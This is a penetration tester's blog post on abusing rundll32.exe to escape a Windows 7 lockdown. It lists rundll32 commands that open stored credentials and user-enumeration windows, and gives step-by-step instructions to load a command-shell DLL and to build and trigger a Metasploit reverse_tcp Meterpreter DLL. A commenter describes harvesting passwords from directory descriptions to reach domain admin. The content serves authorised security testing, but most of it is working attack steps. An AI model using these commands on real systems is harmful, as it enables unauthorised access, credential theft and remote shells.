Feb 11

rundll32 lockdown testing goodness

I was recently on a Windows 7 workstation lock-down test which had been implemented pretty effectively with the vast majority of file and folder, service and AppLocker applied rules and permissions preventing the majority of malicious actions.

However, I found that I was able to utilise rundll32.exe to attempt to enumerate/manipulate the environment.  I couldn’t really find a good pentest related resource for leveraging rundll32 so thought I’d a put something together to highlight what I’d found to be useful.

All of the following commands have been tested on Windows 7 Ultimate, buts it’s worth bearing in mind that even if the command runs successfully you’ll still be restricted to the security context of the current user (but at least you’ll have a way of initiating the command / function that you may not have had before).

I’ve also refrained from referencing any Control Panel (.cpl) related commands, as these can all be trivially called from C:\Windows\System32 (and most weren’t executable during my engagement).

Note: The usage screenshots have been run from the command line for the sake of clarity, in reality you’re unlikely to have cmd.exe (or PowerShell) access and the rundll32 commands (and arguments) will need to be called via Windows shortcuts (as described towards the end of this post).

Main Commands:
rundll32 Shell32.dll,SHHelpShortcuts_RunDLL Connect – Map Network Drives
rundll32.exe shell32.dll,Control_RunDLL – Control Panel
rundll32.exe devmgr.dll DeviceManager_Execute – Device Manager (view only)
rundll32.exe shell32.dll,Options_RunDLL 1 – Taskbar Options
rundll32.exe shell32.dll,Options_RunDLL 2 – Search Options
rundll32.exe shell32.dll,Options_RunDLL 3 – Start Menu Options
rundll32.exe shell32.dll,Options_RunDLL 4 – Turn System icons on/off
rundll32.exe shell32.dll,Options_RunDLL 5 – Taskbar Notifications on/off
rundll32.exe shell32.dll,Options_RunDLL 6 – Taskbar Toolbar Display Options
rundll32.exe shell32.dll,Options_RunDLL 7 – View File and Folder Options (see below)

rundll32.exe keymgr.dll, KRShowKeyMgr – Stored Usernames/Passwords (see below)

rundll32 Shell32.dll,OpenAs_RunDLL file.abc – Change file associations (e.g. ext .abc)

rundll32.exe van.dll,RunVAN – Network Popup (Subsequently access networking?)
rundll32.exe shwebsvc.dll,AddNetPlaceRunDll – Add network location (wizard)
rundll32.exe oobefldr.dll,ShowWelcomeCenter – Start Welcome Centre
rundll32.exe dsquery,OpenQueryWindow – Find Users (New targets to brute force?)

More Intrusive Commands:
rundll32.exe powrprof.dll,SetSuspendState – Hibernate
RunDll32.exe user32.dll,LockWorkStation – Lock Screen

Utilise a Third Party .DLL?

Didier Steven’s has produced a nice write up on taking a third party command interpreter and converting it from .exe to .dll, for more information see: Didier’s Blog

If we’re able to upload our new .dll to our target system we may be able to leverage a command prompt via rundll32.exe, the steps to do this are as follows:

1. Upload Didier Steven’s cmd.dll to your target system.
2. Create a new shortcut (on your desktop for example):
C:\Windows\System32\rundll32.exe c:\users\test123\desktop\cmd.dll,Control_RunDLL
3. Double click your new shortcut to pop your command shell

Metasploit Reverse Shell?

Another option to abuse rundll32 maybe to upload a Metasploit derived .dll, the steps to do this are as follows:

1. Create our reverse_shell .dll file:
msfvenom -p windows/meterpreter/reverse_tcp -f dll LHOST= LPORT=12345 > ./pentest.dll

2. Upload the reverse_shell payload .dll file to our target system e.g. HTTP

3. Start our reverse listener on our pentest host via Metasploit’s: /exploit/multi/handler

4. Trigger the .dll via the same method used with cmd.dll (above), i.e. via a shortcut:
C:\Windows\System32\rundll32.exe c:\users\test123\desktop\pentest.dll,Control_RunDLL
We now have a full meterpreter session in the context of our standard user, but we’re now able to initiate privilege escalation etc. via the Metasploit framework 🙂

By way of further reading; JavaScript can also be called through rundll32.exe, checkout the following post:


1 comment

  1. scriptmonkey

    Wish I had thought to look at your site prior to a job I had yesterday. Spent a while phone googling for an answer to pop the dsquery box up.

    Good point regarding that one: the description field, filter on “exists” and go reading, often find dev accounts with passwords written in the comments, found 3 accounts yesterday, 1 with DA. boof. 🙂

    P.S. VPN post is a third written, long way to go especially as the new wordpress v4.0 managed to lose half a draft it seems. 🙁 Also didn’t realise I never had you added to my interesting links section, will throw you in it.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>